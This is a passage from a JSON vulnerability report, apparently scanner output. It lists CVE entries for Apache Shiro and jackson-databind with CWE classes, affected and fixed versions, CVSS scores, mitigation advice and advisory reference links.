Users should update to Apache Shiro 1.8.0."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.7.1"],"known_not_affected":["org.apache.shiro/shiro-core@1.8.0"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raae98bb934e4bde304465896ea02d9798e257e486d04a42221e2c41b@%3Cuser.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re470be1ffea44bca28ccb0e67a4cf5d744e2d2b981d00fdbbf5abc13%40%3Cannounce.shiro.apache.org%3E"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41303"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41303"},{"summary":"NetApp Advisory ntap-20220609-0001","url":"https://security.netapp.com/advisory/ntap-20220609-0001"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.7.1"]}],"title":"CVE-2021-41303/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-46749"]}],"cve":"CVE-2023-46749","cwe":{"id":"22","name":"Improper 
Limitation of a Pathname to a Restricted Directory"},"discovery_date":"2024-01-15T12:30:19","ids":[{"system_name":"CVE Record","text":"CVE-2023-46749"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Shiro vulnerable to path traversal"},{"category":"details","details":"Vulnerability Details","text":"# Apache Shiro vulnerable to path traversal Apache Shiro before 1.130 or 2.0.0-alpha-4, may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default)."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.12.0"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/mdv7ftz7k4488rzloxo2fb0p9shnp9wm"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46749"},{"summary":"CVE 
Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46749"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.12.0"]}],"title":"CVE-2023-46749/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11619"]}],"cve":"CVE-2020-11619","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:44","ids":[{"system_name":"CVE Record","text":"CVE-2020-11619"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"NetApp Advisory","text":"ntap-20200511-0004"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization 
gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11619"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11619"},{"summary":"NetApp Advisory ntap-20200511-0004","url":"https://security.netapp.com/advisory/ntap-20200511-0004"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory 
cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11619/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-25649"]}],"cve":"CVE-2020-25649","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2021-02-18T20:51:54","ids":[{"system_name":"CVE Record","text":"CVE-2020-25649"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210108-0007"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1887664"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"XML External Entity (XXE) Injection in Jackson Databind"},{"category":"details","details":"Vulnerability Details","text":"# XML External Entity (XXE) Injection in Jackson 
Databind A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0.0|<2.9.10.7"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.7"]},"references":[{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1887664"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r011d1430e8f40dff9550c3bc5d0f48b14c01ba8aecabd91d5e495386@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r024b7bda9c43c5560d81238748775c5ecfe01b57280f90df1f773949@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r04529cedaca40c2ff90af4880493f9c88a8ebf4d1d6c861d23108a5a@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0881e23bd9034c8f51fdccdc8f4d085ba985dcd738f8520569ca5c3d@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0b8dc3acd4503e4ecb6fbd6ea7d95f59941168d8452ac0ab1d1d96bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1b7ed0c4b6c4301d4dfd6fdbc5581b0a789d3240cab55d766f33c6c6@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2882fc1f3032cd7be66e28787f04ec6f1874ac68d47e310e30ff7eb1@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2b6ddb3a4f4cd11d8f6305011e1b7438ba813511f2e3ab3180c7ffda@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r2eb66c182853c69ecfb52f63d3dec09495e9b65be829fd889a081ae1@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2f5c5479f99398ef344b7ebd4d90bc3316236c45d0f3bc42090efcd7@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r31f4ee7d561d56a0c2c2c6eb1d6ce3e05917ff9654fdbfec05dc2b83@%3Ccommits.servicecomb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3e6ae311842de4e64c5d560a475b7f9cc7e0a9a8649363c6cf7537eb@%3Ccommits.karaf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r407538adec3185dd35a05c9a26ae2f74425b15132470cf540f41d85b@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r45e7350dfc92bb192f3f88e9971c11ab2be0953cc375be3dda5170bd@%3Cissues.flink.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5b130fe668503c4b7e2caf1b16f86b7f2070fd1b7ef8f26195a2ffbd@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5f8a1608d758936bd6bbc5eed980777437b611537bf6fff40663fc71@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r605764e05e201db33b3e9c2e66ff620658f07ad74f296abe483f7042@%3Creviews.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r63c87aab97155f3f3cbe11d030c4a184ea0de440ee714977db02e956@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r68d029ee74ab0f3b0569d0c05f5688cb45dd3abe96a6534735252805@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a4f3ef6edfed2e0884269d84798f766779bbbc1005f7884e0800d61@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a6df5647583541e3cb71c75141008802f7025cee1c430d4ed78f4cc@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6cbd599b80e787f02ff7a1391d9278a03f37d6a6f4f943f0f01a62fb@%3Creviews.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6e3d4f7991542119a4ca6330271d7fbf7b9fb3abab24ada82ddf1ee4@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r73bef1bb601a9f093f915f8075eb49fcca51efade57b817afd5def07@%3Ccommits.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r765283e145049df9b8998f14dcd444345555aae02b1610cfb3188bf8@%3Cnotifications.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r78d53a0a269c18394daf5940105dc8c7f9a2399503c2e78be20abe7e@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7cb5b4b3e4bd41a8042e5725b7285877a17bcbf07f4eb3f7b316af60@%3Creviews.iotdb.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r86c78bf7656fdb2dab69cbf17f3d7492300f771025f1a3a65d5e5ce5@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8764bb835bcb8e311c882ff91dd3949c9824e905e880930be56f6ba3@%3Cuser.spark.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8ae961c80930e2717c75025414ce48a432cea1137c02f648b1fb9524@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r900d4408c4189b376d1ec580ea7740ea6f8710dc2f0b7e9c9eeb5ae0@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r90d1e97b0a743cf697d89a792a9b669909cc5a1692d1e0083a22e66c@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r91722ecfba688b0c565675f8bf380269fde8ec62b54d6161db544c22@%3Ccommits.karaf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r94c7e86e546120f157264ba5ba61fd29b3a8d530ed325a9b4fa334d7@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r95a297eb5fd1f2d3a2281f15340e2413f952e9d5503296c3adc7201a@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98bfe3b90ea9408f12c4b447edcb5638703d80bc782430aa0c210a54@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/ra1157e57a01d25e36b0dc17959ace758fc21ba36746de29ba1d8b130@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra409f798a1e5a6652b7097429b388650ccd65fd958cee0b6f69bba00@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra95faf968f3463acb3f31a6fbec31453fc5045325f99f396961886d3@%3Cissues.flink.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raf13235de6df1d47a717199e1ecd700dff3236632f5c9a1488d9845b@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb674520b9f6c808c1bf263b1369e14048ec3243615f35cfd24e33604@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc15e90bbef196a5c6c01659e015249d6c9a73581ca9afb8aeecf00d2@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc82ff47853289e9cd17f5cfbb053c04cafc75ee32e3d7223963f83bb@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc88f2fa2b7bd6443921727aeee7704a1fb02433e722e2abf677e0d3d@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc959cdb57c4fe198316130ff4a5ecbf9d680e356032ff2e9f4f05d54@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd317f15a675d114dbf5b488d27eeb2467b4424356b16116eb18a652d@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rd57c7582adc90e233f23f3727db3df9115b27a823b92374f11453f34@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd6f6bf848c2d47fa4a85c27d011d948778b8f7e58ba495968435a0b3@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdca8711bb7aa5d47a44682606cd0ea3497e2e922f22b7ee83e81e6c1@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdf9a34726482222c90d50ae1b9847881de67dde8cfde4999633d2cdc@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re16f81d3ad49a93dd2f0cba9f8fc88e5fb89f30bf9a2ad7b6f3e69c1@%3Ccommits.karaf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re96dc7a13e13e56190a5d80f9e5440a0d0c83aeec6467b562fbf2dca@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1809a1374041a969d77afab21fc38925de066bc97e86157d3ac3402@%3Ccommits.karaf.apache.org%3E"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6X2UT4X6M7DLQYBOOHMXBWGYJ65RL2CT"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-25649"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-25649"},{"summary":"NetApp Advisory ntap-20210108-0007","url":"https://security.netapp.com/advisory/ntap-20210108-0007"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory 
cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0.0|<2.9.10.7"]}],"title":"CVE-2020-25649/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-8840"]}],"cve":"CVE-2020-8840","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-03-04T20:52:14","ids":[{"system_name":"CVE Record","text":"CVE-2020-8840"},{"system_name":"Oracle Advisory","text":"cpuapr2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Huawei Advisory","text":"huawei-sa-20200610-01-fastjason-en"},{"system_name":"NetApp Advisory","text":"ntap-20200327-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of Untrusted Data in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of Untrusted Data in jackson-databind FasterXML 
jackson-databind 2.x before 2.6.7.4, 2.7.x before 2.7.9.7, 2.8.x before 2.8.11.5 and 2.9.x before 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.3"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.3"]},"references":[{"summary":"Huawei Advisory huawei-sa-20200610-01-fastjason-en","url":"http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-01-fastjason-en"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r078e68a926ea6be12e8404e47f45aabf04bb4668e8265c0de41db6db@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1c09b9551f6953dbeca190a4c4b78198cdbb9825fce36f96fe3d8218@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1efc776fc6ce3387593deaa94bbdd296733b1b01408a39c8d1ab9e0e@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2fa8046bd47fb407ca09b5107a80fa6147ba4ebe879caae5c98b7657@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r319f19c74e06c201b9d4e8b282a4e4b2da6dcda022fb46f007dd00d3@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3539bd3a377991217d724879d239e16e86001c54160076408574e1da@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3d20a2660b36551fd8257d479941782af4a7169582449fac1704bde2@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r428d068b2a4923f1a5a4f5fc6381b95205cfe7620169d16db78e9c71@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r446646c5588b10f5e02409ad580b12f314869009cdfbf844ca395cec@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r46bebdeb59b8b7212d63a010ca445a9f5c4e9d64dcf693cab6f399d3@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5d8bea8e9d17b6efcf4a0e4e194e91ef46a99f505777a31a60da2b38@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r65ee95fa09c831843bac81eaa582fdddc2b6119912a72d1c83a9b882@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6fdd4c61a09a0c89f581b4ddb3dc6f154ab0c705fcfd0a7358b2e4e5@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7762d69e85c58d6948823424017ef4c08f47de077644277fa18cc116@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8170007fd9b263d65b37d92a7b5d7bc357aedbb113a32838bc4a9485@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r94930e39b60fff236160c1c4110fe884dc093044b067aa5fc98d7ee1@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r9e59ebaf76fd00b2fa3ff5ebf18fe075ca9f4376216612c696f76718@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9ecf211c22760b00967ebe158c6ed7dba9142078e2a630ab8904a5b7@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra275f29615f35d5b40106d1582a41e5388b2a5131564e9e01a572987@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rac5ee5d686818be7e7c430d35108ee01a88aae54f832d32f62431fd1@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb43f9a65150948a6bebd3cb77ee3e105d40db2820fd547528f4e7f89@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb5eedf90ba3633e171a2ffdfe484651c9490dc5df74c8a29244cbc0e@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb73708bf714ed6dbc1212da082e7703e586077f0c92f3940b2e82caf@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb99c7321eba5d4c907beec46675d52827528b738cfafd48eb4d862f1@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc717fd6c65190f4e592345713f9ef0723fb7d71f624caa2a17caa26a@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcc72b497e3dff2dc62ec9b89ceb90bc4e1b14fc56c3c252a6fcbb013@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdea588d4a0ebf9cb7ce8c3a8f18d0d306507c4f8ba178dd3d20207b8@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache 
